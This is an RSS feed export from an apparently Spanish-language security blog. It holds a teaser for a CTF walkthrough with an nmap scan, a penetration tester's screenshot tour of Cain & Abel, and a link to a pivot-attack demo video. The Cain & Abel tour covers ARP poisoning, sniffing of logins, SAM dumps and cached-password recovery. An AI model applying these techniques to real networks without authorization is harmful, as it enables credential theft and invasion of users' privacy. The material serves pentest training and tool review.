<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sec-Track &#187; Test de Penetración</title>
	<atom:link href="http://www.sec-track.com/category/test-de-penetracion/feed" rel="self" type="application/rss+xml" />
	<link>http://www.sec-track.com</link>
	<description></description>
	<lastBuildDate>Wed, 01 Feb 2012 15:08:22 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Solucionario para el Hackademic.RTB2 by @crodallega (Spoiler &#8211; NO LEER sin intentarlo antes!!!)</title>
		<link>http://www.sec-track.com/solucionario-para-el-hackademic-rtb2-by-crodallega-spoiler-no-leer-sin-intentarlo-antes</link>
		<comments>http://www.sec-track.com/solucionario-para-el-hackademic-rtb2-by-crodallega-spoiler-no-leer-sin-intentarlo-antes#comments</comments>
		<pubDate>Sat, 28 Jan 2012 07:19:41 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[root?]]></category>
		<category><![CDATA[Solucionario]]></category>
		<category><![CDATA[Spoiler]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=1104</guid>
		<description><![CDATA[Hace poco más de un mes publiqué el reto conocido como Hackademic.RTB2 y hace algunos días publiqué el gran solucionario propuesto por el investigador y consultor experto en seguridad de la información Fernando Quintero (@nonroot). Ahora, como si fuera poco @crodallega nos comparte otro solucionario con base al presentado por nonroot al que de nombre le da Hackademic.rtb2 [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hace poco más de un mes publiqué el reto conocido como <a href="http://www.sec-track.com/hackademic-rtb2-the-second-realistic-hackademic-challenge-root-this-box" target="_blank">Hackademic.RTB2</a> y hace algunos días publiqué el gran <a href="http://www.sec-track.com/solucionario-para-el-hackademic-rtb2-by-nonroot-spoiler-no-leer-sin-intentarlo-antes" target="_blank">solucionario </a>propuesto por el investigador y consultor experto en seguridad de la información <a href="http://nonroot.blogspot.com/" target="_blank">Fernando Quintero</a> (<a href="https://www.twitter.com/@nonroot" target="_blank">@nonroot</a>). Ahora, como si fuera poco <a href="https://twitter.com/@crodallega" target="_blank">@crodallega</a> nos comparte otro solucionario con base al presentado por <a href="https://www.twitter.com/@nonroot" target="_blank">nonroot</a> al que de nombre le da <em>Hackademic.rtb2 un solucionario with nails</em>. Esto debido a que las técnicas presentadas en la etapa intermedia se realizan de un modo más manual y explicativo.</p>
<p style="text-align: justify;">Sin más, el solucionario de Carlos Rodallega</p>
<p style="text-align: justify;"><a href="https://www.twitter.com/@crodallega" target="_blank">@crodallega</a> says:</p>
<p style="text-align: justify;">Una vez ha iniciado los entonos target y atacante iniciamos realizando un típico barrido de pings root@bt:~/hackademic2# nmap -sP 192.168.209.1-255</p>
<p style="text-align: justify;">Donde se identifican 3 host activos (pueden haber mas) de los cuales descartamos los 2 últimos debido a que el de IP .131 es nuestra maquina atacante y el .254 es la interface que configura vmware cuando usamos el modo solo host, haciendo uso de la misma herramienta (nmap) y con base en la información recolectada realizamos un escaneo de puertos a partir del cual tenemos 2 puertos activos 1 abierto y 1 filtrado.</p>
<p style="text-align: justify;"><a href="http://carlosrodallega.blogspot.com/2012/01/esta-es-la-entrada-ejemplo-dsf-dsdf.html" target="_blank">Continua leyendo el solucionario desde el blog de @crodallega &gt;&gt;</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/solucionario-para-el-hackademic-rtb2-by-crodallega-spoiler-no-leer-sin-intentarlo-antes/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>“Como CAIN&amp;ABEL No hay otro igual”</title>
		<link>http://www.sec-track.com/%e2%80%9ccomo-cainabel-no-hay-otro-igual%e2%80%9d</link>
		<comments>http://www.sec-track.com/%e2%80%9ccomo-cainabel-no-hay-otro-igual%e2%80%9d#comments</comments>
		<pubDate>Tue, 22 Feb 2011 20:50:10 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Cain & Abel]]></category>
		<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=898</guid>
		<description><![CDATA[Saludos a todos, Sí, esa es la razón de ser de este escrito,  “Como CAIN&#38; ABEL no hay otro igual” y no estoy haciendo referencia a “Holy Bible” y la Narración del chicho Bueno y el chico Malo con su sacrificio ante Dios. Como leerán y verán a continuación Cain es un chico tan bueno [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Saludos a todos,</p>
<p style="text-align: justify;">Sí, esa es la razón de ser de este escrito,  “Como CAIN&amp; ABEL no hay otro igual” y no estoy haciendo referencia a “<em>Holy Bible</em>” y la Narración del chicho Bueno y el chico Malo con su sacrificio ante Dios.</p>
<p style="text-align: justify;">Como leerán y verán a continuación Cain es un chico tan bueno como Abel.</p>
<p style="text-align: justify;">En realidad estoy haciendo referencia al excelente software creado por el Señor Massimiliano Montoro y su grandioso <a href="http://www.oxid.it/cain.html" target="_blank"><strong>Web Site</strong></a> .</p>
<p style="text-align: justify;">Rondaba en mi cabeza la intención de escribir desde hace mucho rato sobre este maravilloso aplicativo, puesto que se convirtió en uno más de las armas de mi arsenal para Análisis de Seguridad, el cual no puede faltar en ningún de mis Test de Intrusión Interno, apelando a sus excelentes métodos para la recuperación y desciframiento de contraseñas, contribuyendo así  en la consecución de hallazgos que nos fortalezcan nuestras evidencias de auditoría de seguridad.</p>
<p style="text-align: justify;">Antes de pasar a las imágenes de evidencia, una breve descripción de lo que es CAIN&amp;ABEL  para quien no conozca de esta maravillosa herramienta Multiuso.</p>
<p style="text-align: justify;">“Caín y Abel es una herramienta de recuperación de contraseña para sistemas operativos de Microsoft.  Permite la recuperación fácil de diversos tipo de contraseñas por métodos de sinfín de la red (olfateo de red), craqueo contraseñas cifradas utilizando ataques de  diccionario, fuerza bruta y ataques de criptoanálisis, permite grabar conversaciones de VoIP, descodificar contraseñas, recuperar claves de la red inalámbrica, revelar  contraseñas en Text Box, caché las contraseñas en Windows y el análisis de protocolos de enrutamiento.</p>
<p style="text-align: justify;">La última versión es más rápida y contiene muchas características nuevas como APR (Arp Poison Routing) que permite el rastreo en cambió de LANs y ataques Man-in-the-Middle.</p>
<p style="text-align: justify;">El sniffer en esta versión también puede analizar los protocolos cifrados como SSH-1 y HTTPS y contiene los filtros para capturar las credenciales de una amplia gama de mecanismos de autenticación. “</p>
<p style="text-align: justify;">Bien y si no me crees, échale un vistazo a las siguientes evidencias. El orden de los factores no altera el producto  xDDD</p>
<p style="text-align: justify;">No pretendo entregar un manual del producto, el cual puedes descargar de aquí <a href="http://www.oxid.it/ca_um">View Cain &amp; Abel on-line User Manual</a> Así que iré detallando cada evidencia sin establecer un nivel o criterio de importancia.</p>
<p style="text-align: justify;">Corresponden a diversos proyectos ejecutados de los cuales tratare de incluir lo que considere más relevante, ya que si me doy a la tarea de subir todo, creo que este Artículo no me alcanzaría para su inclusión.</p>
<p style="text-align: justify;"><strong>Enumeración de Equipos o Sondeo de Red.</strong></p>
<p style="text-align: justify;">Si hacemos uso de Su pestaña de Host y Network tenemos la posibilidad de Sondear o enumerar la Red de la cual pertenecemos al segmento de Red o tenemos enrutamiento alguno.  De igual forma tratar de acceder a recursos compartidos, Bases de Datos, o registros de Windows en los equipos.</p>
<p style="text-align: center;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/11.jpg"><img class="aligncenter size-full wp-image-901" title="1" src="http://www.sec-track.com/wp-content/uploads/2011/02/11.jpg" alt="" width="550" height="498" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/2.jpg"><img class="aligncenter size-full wp-image-903" title="2" src="http://www.sec-track.com/wp-content/uploads/2011/02/2.jpg" alt="" width="547" height="496" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/3.jpg"><img class="aligncenter size-full wp-image-904" title="3" src="http://www.sec-track.com/wp-content/uploads/2011/02/3.jpg" alt="" width="534" height="490" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/4.jpg"><img class="aligncenter size-full wp-image-905" title="4" src="http://www.sec-track.com/wp-content/uploads/2011/02/4.jpg" alt="" width="560" height="458" /></a></p>
<p>Recursos Compartidos, acceso por clave o usuario Anonymous</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/5.jpg"><img class="aligncenter size-full wp-image-906" title="5" src="http://www.sec-track.com/wp-content/uploads/2011/02/5.jpg" alt="" width="560" height="496" /></a></p>
<p>Llaves de Registro y Recursos Compartidos.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/6.jpg"><img class="aligncenter size-full wp-image-907" title="6" src="http://www.sec-track.com/wp-content/uploads/2011/02/6.jpg" alt="" width="560" height="510" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/7.jpg"><img class="aligncenter size-full wp-image-908" title="7" src="http://www.sec-track.com/wp-content/uploads/2011/02/7.jpg" alt="" width="533" height="538" /></a></p>
<p>Enumeración de usuarios, registro y recursos compartidos</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/8.jpg"><img class="aligncenter size-full wp-image-909" title="8" src="http://www.sec-track.com/wp-content/uploads/2011/02/8.jpg" alt="" width="570" height="378" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/9.jpg"><img class="aligncenter size-full wp-image-910" title="9" src="http://www.sec-track.com/wp-content/uploads/2011/02/9.jpg" alt="" width="560" height="505" /></a></p>
<p>Enumeración de Servicios.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/10.jpg"><img class="aligncenter size-full wp-image-911" title="10" src="http://www.sec-track.com/wp-content/uploads/2011/02/10.jpg" alt="" width="570" height="515" /></a></p>
<p>Registro del sistema</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/111.jpg"><img class="aligncenter size-full wp-image-912" title="11" src="http://www.sec-track.com/wp-content/uploads/2011/02/111.jpg" alt="" width="454" height="547" /></a></p>
<p style="text-align: justify;">En algunas ocasiones nuestra estación de trabajo es controlada o nos aplican restricciones con medidas como Vlans o Acls (Listas de Control de Accesos), etc.  Algunas formas de tratar de evadirlas es montando una Maquina virtual y estableciendo una configuración estática o dinámica, un Ip spoofing,  mac spoofing,  con una mac diferente para saltar el control de Acls por MAC, como se muestra a continuación capturando credenciales de autenticación (login y password) en  tramas de HTTP una vez se ha iniciado un ARP Poisoning.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/12.jpg"><img class="aligncenter size-full wp-image-913" title="12" src="http://www.sec-track.com/wp-content/uploads/2011/02/12.jpg" alt="" width="560" height="316" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/13.jpg"><img class="aligncenter size-full wp-image-914" title="13" src="http://www.sec-track.com/wp-content/uploads/2011/02/13.jpg" alt="" width="560" height="342" /></a></p>
<p style="text-align: justify;">Captura de tramas HTTP con credenciales y comportamientos de navegación, si tienes algún sitio prohibido de navegación, aquí te darás cuenta que te están saltando el proxy o el Web Content.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/14.jpg"><img class="aligncenter size-full wp-image-915" title="14" src="http://www.sec-track.com/wp-content/uploads/2011/02/14.jpg" alt="" width="560" height="312" /></a></p>
<p>Captura de credenciales de autenticación servicio FTP, en conexiones FTP</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/15.jpg"><img class="aligncenter size-full wp-image-916" title="15" src="http://www.sec-track.com/wp-content/uploads/2011/02/15.jpg" alt="" width="386" height="442" /></a></p>
<p>Explotando el servicio  ;P</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/16.jpg"><img class="aligncenter size-full wp-image-917" title="16" src="http://www.sec-track.com/wp-content/uploads/2011/02/16.jpg" alt="" width="490" height="479" /></a></p>
<p>O lo prefieres visualizar así  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/17.jpg"><img class="aligncenter size-full wp-image-918" title="17" src="http://www.sec-track.com/wp-content/uploads/2011/02/17.jpg" alt="" width="488" height="545" /></a></p>
<p>Captura de tramas del protocolo <em>SIP</em> (Session Initiation <em>Protocol</em>) en un sistema Asterisk (VoiP).</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/18.jpg"><img class="aligncenter size-full wp-image-919" title="18" src="http://www.sec-track.com/wp-content/uploads/2011/02/18.jpg" alt="" width="560" height="266" /></a></p>
<p>Captura de tramas protocolo POP3 (servicio de correo interno)</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/19.jpg"><img class="aligncenter size-full wp-image-921" title="19" src="http://www.sec-track.com/wp-content/uploads/2011/02/19.jpg" alt="" width="560" height="290" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/20.jpg"><img class="aligncenter size-full wp-image-922" title="20" src="http://www.sec-track.com/wp-content/uploads/2011/02/20.jpg" alt="" width="449" height="377" /></a></p>
<p>Captura de tramas protocolo SMB. Indicio excelente para aplicar un SMB Relay  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/21.jpg"><img class="aligncenter size-full wp-image-923" title="21" src="http://www.sec-track.com/wp-content/uploads/2011/02/21.jpg" alt="" width="560" height="280" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/22.jpg"><img class="aligncenter size-full wp-image-924" title="22" src="http://www.sec-track.com/wp-content/uploads/2011/02/22.jpg" alt="" width="560" height="301" /></a></p>
<p>Captura credenciales Oracle (TNS) ciframiento tipo DES !!</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/23.jpg"><img class="aligncenter size-full wp-image-925" title="23" src="http://www.sec-track.com/wp-content/uploads/2011/02/23.jpg" alt="" width="560" height="348" /></a></p>
<p>Captura  tramas de VoIP</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/24.jpg"><img class="aligncenter size-full wp-image-927" title="24" src="http://www.sec-track.com/wp-content/uploads/2011/02/24.jpg" alt="" width="560" height="170" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/25.jpg"><img class="aligncenter size-full wp-image-928" title="25" src="http://www.sec-track.com/wp-content/uploads/2011/02/25.jpg" alt="" width="560" height="252" /></a></p>
<p>Volcado de la SAM en una estación de trabajo vulnerada por su baja seguridad a nivel de LOCALHOST.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/26.jpg"><img class="aligncenter size-full wp-image-929" title="26" src="http://www.sec-track.com/wp-content/uploads/2011/02/26.jpg" alt="" width="560" height="336" /></a></p>
<p>Proceso de ARP poisong y MITM (Man In The Middle) con Cain</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/27.jpg"><img class="aligncenter size-full wp-image-930" title="27" src="http://www.sec-track.com/wp-content/uploads/2011/02/27.jpg" alt="" width="560" height="357" /></a></p>
<p>Captura de tramas http de archivos, aplicativos que pueden ser modificados On line.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/28.jpg"><img class="aligncenter size-full wp-image-931" title="28" src="http://www.sec-track.com/wp-content/uploads/2011/02/28.jpg" alt="" width="560" height="317" /></a></p>
<p style="text-align: justify;">Credenciales de autenticación conexión es Wirelles tomadas de los Cache Passwords de un equipo vulnerado a nivel de Localhost,  en donde se ha instalado Cain&amp;Abel.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/29.jpg"><img class="aligncenter size-full wp-image-932" title="29" src="http://www.sec-track.com/wp-content/uploads/2011/02/29.jpg" alt="" width="560" height="290" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/30.jpg"><img class="aligncenter size-full wp-image-933" title="30" src="http://www.sec-track.com/wp-content/uploads/2011/02/30.jpg" alt="" width="560" height="235" /></a></p>
<p style="text-align: justify;">Creo que no te gustaría que te encontraran visitando sitios de tu preferencia xDD.</p>
<p style="text-align: justify;">Aclaro que no tengo nada contra la definición de Género o estilos de Vida. Pero con esta sociedad de doble moral, no creo que te guste que encuentren que visitas estos sitios. El problema es que este es un equipo corporativo de trabajo.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/31.jpg"><img class="aligncenter size-full wp-image-934" title="31" src="http://www.sec-track.com/wp-content/uploads/2011/02/31.jpg" alt="" width="560" height="253" /></a></p>
<p>Información de los Windows Mail Passwords del Cached Passwords del equipo.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/32.jpg"><img class="aligncenter size-full wp-image-935" title="32" src="http://www.sec-track.com/wp-content/uploads/2011/02/32.jpg" alt="" width="560" height="222" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/33.jpg"><img class="aligncenter size-full wp-image-936" title="33" src="http://www.sec-track.com/wp-content/uploads/2011/02/33.jpg" alt="" width="560" height="343" /></a></p>
<p>Información de los Credential Manager del Cached Passwords del equipo.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/34.jpg"><img class="aligncenter size-full wp-image-937" title="34" src="http://www.sec-track.com/wp-content/uploads/2011/02/34.jpg" alt="" width="560" height="157" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/35.jpg"><img class="aligncenter size-full wp-image-938" title="35" src="http://www.sec-track.com/wp-content/uploads/2011/02/35.jpg" alt="" width="560" height="264" /></a></p>
<p>Información del Protected Storage del Cached Passwords del equipo.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/36.jpg"><img class="aligncenter size-full wp-image-939" title="36" src="http://www.sec-track.com/wp-content/uploads/2011/02/36.jpg" alt="" width="560" height="221" /></a></p>
<p>Información del Dialup Password del Cached Passwords del equipo</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/37.jpg"><img class="aligncenter size-full wp-image-940" title="37" src="http://www.sec-track.com/wp-content/uploads/2011/02/37.jpg" alt="" width="544" height="475" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/38.jpg"><img class="aligncenter size-full wp-image-941" title="38" src="http://www.sec-track.com/wp-content/uploads/2011/02/38.jpg" alt="" width="560" height="300" /></a></p>
<p style="text-align: justify;">Captura de Credential Manager en Cached Passwords, credencial de controlador de Dominio Maestro.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/39.jpg"><img class="aligncenter size-full wp-image-942" title="39" src="http://www.sec-track.com/wp-content/uploads/2011/02/39.jpg" alt="" width="560" height="239" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/40.jpg"><img class="aligncenter size-full wp-image-943" title="40" src="http://www.sec-track.com/wp-content/uploads/2011/02/40.jpg" alt="" width="560" height="291" /></a></p>
<p>Captura de Certificados</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/41.jpg"><img class="aligncenter size-full wp-image-944" title="41" src="http://www.sec-track.com/wp-content/uploads/2011/02/41.jpg" alt="" width="533" height="383" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/42.jpg"><img class="aligncenter size-full wp-image-945" title="42" src="http://www.sec-track.com/wp-content/uploads/2011/02/42.jpg" alt="" width="560" height="456" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/43.jpg"><img class="aligncenter size-full wp-image-946" title="43" src="http://www.sec-track.com/wp-content/uploads/2011/02/43.jpg" alt="" width="575" height="533" /></a></p>
<p style="text-align: justify;">Función Cracker de Cain&amp;Abel en donde puedes utilizar varios métodos para descifrar los hash de las contraseñas por medio de ataques por diccionario, fuera bruta, intentos, etc. Adicionalmente puedes subir diccionarios personalizados o las tablas de Rainbow Tables.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/44.jpg"><img class="aligncenter size-full wp-image-947" title="44" src="http://www.sec-track.com/wp-content/uploads/2011/02/44.jpg" alt="" width="560" height="326" /></a></p>
<p style="text-align: justify;">Capturas de sesión de Telnet</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/45.jpg"><img class="aligncenter size-full wp-image-948" title="45" src="http://www.sec-track.com/wp-content/uploads/2011/02/45.jpg" alt="" width="560" height="376" /></a></p>
<p style="text-align: justify;">Descifrado de Hash de VNC levantadas del registro de Windows</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/46.jpg"><img class="aligncenter size-full wp-image-949" title="46" src="http://www.sec-track.com/wp-content/uploads/2011/02/46.jpg" alt="" width="560" height="264" /></a></p>
<p style="text-align: justify;">Esto es una belleza como un Santo Grial, un LDAP abierto de Patitas  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />      Esperando ser coronado</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/47.jpg"><img class="aligncenter size-full wp-image-950" title="47" src="http://www.sec-track.com/wp-content/uploads/2011/02/47.jpg" alt="" width="560" height="295" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/48.jpg"><img class="aligncenter size-full wp-image-951" title="48" src="http://www.sec-track.com/wp-content/uploads/2011/02/48.jpg" alt="" width="560" height="363" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/49.jpg"><img class="aligncenter size-full wp-image-952" title="49" src="http://www.sec-track.com/wp-content/uploads/2011/02/49.jpg" alt="" width="560" height="358" /></a></p>
<p>Capturas de tramas protocolo  SMNP</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/50.jpg"><img class="aligncenter size-full wp-image-953" title="50" src="http://www.sec-track.com/wp-content/uploads/2011/02/50.jpg" alt="" width="560" height="421" /></a></p>
<p>O si tu intención es una Denegación de Servicios (DoS)</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/51.jpg"><img class="aligncenter size-full wp-image-954" title="51" src="http://www.sec-track.com/wp-content/uploads/2011/02/51.jpg" alt="" width="505" height="380" /></a></p>
<p>Huyyyyy   <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p style="text-align: justify;">La verdad dejemos hasta aquí porque me canse y se me atrasaron algunas vainas de trabajo y académicas……..</p>
<p style="text-align: justify;">He probado algunas otras opciones como el Cracking de Wirelles, Accesos por RDP, desciframiento de BD, Conexión a BD, Desciframiento de CCDU, Traceroute, RSA Token Security ID, Siskey Decoder, DecoderBase64, Cisco VPN Password y Cisco Decode Password. Algunas me han funcionado otras no!!.  A lo mejor por falta de conocimiento o ser mas diestro con la herramienta. Creo que no conozco más del 50% de la misma pero ya puedes medir su potencial con los hallazgos de las evidencias anteriores.</p>
<p style="text-align: justify;">Como puedes ver Cain también es un chico bueno como Abel!!!  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p style="text-align: justify;">Y como su título lo dice no he encontrado herramienta alguna similar para Linux, razón por la cual mantengo mi partición dual Win/BT algunas vainas sobre Windows como algunas herramientas forenses  y de seguridad.</p>
<p style="text-align: justify;">Ahora, no vamos a volver con el mismo cuento que siempre me tomo que usa Dsniff, Ettercap, Wireshark  que combínalo con scripts o con otras herramientas. Ni de esta forma alcanza el gran potencial de esta maravillosa herramienta. Eso si recomiendo,  si encuentras algo similar por favor no dudes en contactarme que es de mi especial interés!!</p>
<p style="text-align: justify;">Con gratitud  se escribió este artículo especialmente para el proyecto <a href="http://www.sec-track.com/" target="_blank"><strong>Sec-Track</strong></a> por permitirme participar de él. Congratulations mi gran amigo 4v4t4r por tan excelente iniciativa de seguridad.</p>
<p style="text-align: justify;">Espero que sean de su agrado estas líneas, que como cosa rara me extendí más de lo que esperaba, aunque como lo dije desde el principio tratare de ser breve, tratando de mostrar el potencial de la herramienta.</p>
<p style="text-align: justify;">No me queda más que despedirme, agradecerles a todos por invertir su tiempo en leer un poco estas líneas de conocimiento.</p>
<p style="text-align: justify;">Bytes</p>
<p style="text-align: justify;"><a href="http://world-of-dino.blogspot.com/" target="_blank"><strong>Dino</strong></a></p>
<p style="text-align: justify;"><strong>PD: </strong>Agradecimientos al Señor Massimiliano Montoro y su grandioso <a href="http://www.oxid.it/cain.html" target="_blank"><strong>Web Site</strong></a></p>
<p><strong>PD2:</strong> Se publica también en mi <a href="http://world-of-dino.blogspot.com/" target="_blank"><strong>Blog</strong></a></p>
<p>&#8212;&#8212;&#8212;&#8211;</p>
<p>Nota de 4v4t4r:</p>
<p><a href="http://twitter.com/d7n0" target="_blank"><strong>@d7n0</strong></a></p>
<ul>
<li>Administrador de Empresas</li>
<li>Gerencia en Consultoría Empresarial</li>
<li>Profesional en Sistemas de Información</li>
<li>Especialización Administración de la Información</li>
<li>Veinte (20) años de experiencia en Sistemas e Informática</li>
<li>Diez (10) años de experiencia en Seguridad Informática</li>
<li>Miembro activo de La Comunidad DragonJAR.</li>
<li>Miembro activo de la Comunidad Team SecurityIT</li>
<li>Coordinador del grupo SWAT de Hacking Etico</li>
<li style="text-align: justify;">Columnista de diversos articulos de seguridad Informatica, Hardening, Análisis Forense, Hacking Etico en revistas Electrónicas, como Hackerss.com, Dragonjar.org.</li>
<li>Analista en Seguridad Informática (Freelance)</li>
<li>Investigador Informática Forense (Freelance)</li>
<li style="text-align: justify;">Vinculación con la Empresa P@ssword S.A. Desde hace tres años desarrollando proyectos de Seguridad Informática (Aseguramiento, Análisis de Seguridad, Análisis Forense) a Organizaciones Gubernamentales, Estatales, Sector Público y Privado.</li>
<li>Asesor y Consultor de TICS</li>
<li style="text-align: justify;">Capacitador Diplomados de Seguridad Informatica en Universidades (Universidad Cooperativa, Universidad Libre de Colombia, Universidad Antonio Nariño, Universidad del Pacifico)</li>
<li>Capacitador cursos de Ethical Hacking en Centros de Entrenamiento de Alta Tecnologia CETEC, Itech Learning</li>
<li style="text-align: justify;">Ponente Nacional en temas de Seguridad Informática en diversos eventos, seminarios y Universidades (Universidad Javeriana, Universidad Santiago de Cali, Universidad Libre, Universidad Autonoma de Popayan, UNAD de Neiva).</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/%e2%80%9ccomo-cainabel-no-hay-otro-igual%e2%80%9d/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Real World Penetration Testing</title>
		<link>http://www.sec-track.com/real-world-penetration-testing</link>
		<comments>http://www.sec-track.com/real-world-penetration-testing#comments</comments>
		<pubDate>Thu, 21 Oct 2010 19:54:59 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[client side attacks]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[password cracking]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=789</guid>
		<description><![CDATA[Daniel Compton, Information Security Consultant of 7Safe, took the audience through a demonstration of common risks found that he sees whilst carrying out penetration tests for clients. This covered two main areas which were &#8220;client side attacks&#8221; and &#8220;pivot attacks&#8221;. The demonstrations were all based on fully patched Windows operating systems with anti-virus protection, firewall [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://twitter.com/#!/commonexploits" target="_blank"><strong>Daniel Compton</strong></a>, Information Security Consultant of <a href="http://7safe.com/index.html" target="_blank"><strong>7Safe</strong></a>, took the audience through a demonstration of common risks found that he sees whilst carrying out penetration tests for clients. This covered two main areas which were &#8220;client side attacks&#8221; and &#8220;pivot attacks&#8221;. The demonstrations were all based on fully patched Windows operating systems with anti-virus protection, firewall protection and the latest patches for 3rd party products. Once the client victim computer was exploited from the Internet, Daniel demonstrated how it was possible to pivot and dive deep into the internal corporate network and extracting passwords and credit card data. You can watch the video demonstration <a href="http://www.commonexploits.com/?p=172" target="_blank"><strong>here</strong></a>.</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/IdYUJUoRNIA?fs=1&amp;hl=en_US" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/IdYUJUoRNIA?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/real-world-penetration-testing/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Implementación de Damn Vulnerable Web Application con VMWare, Qemu y VirtualBox</title>
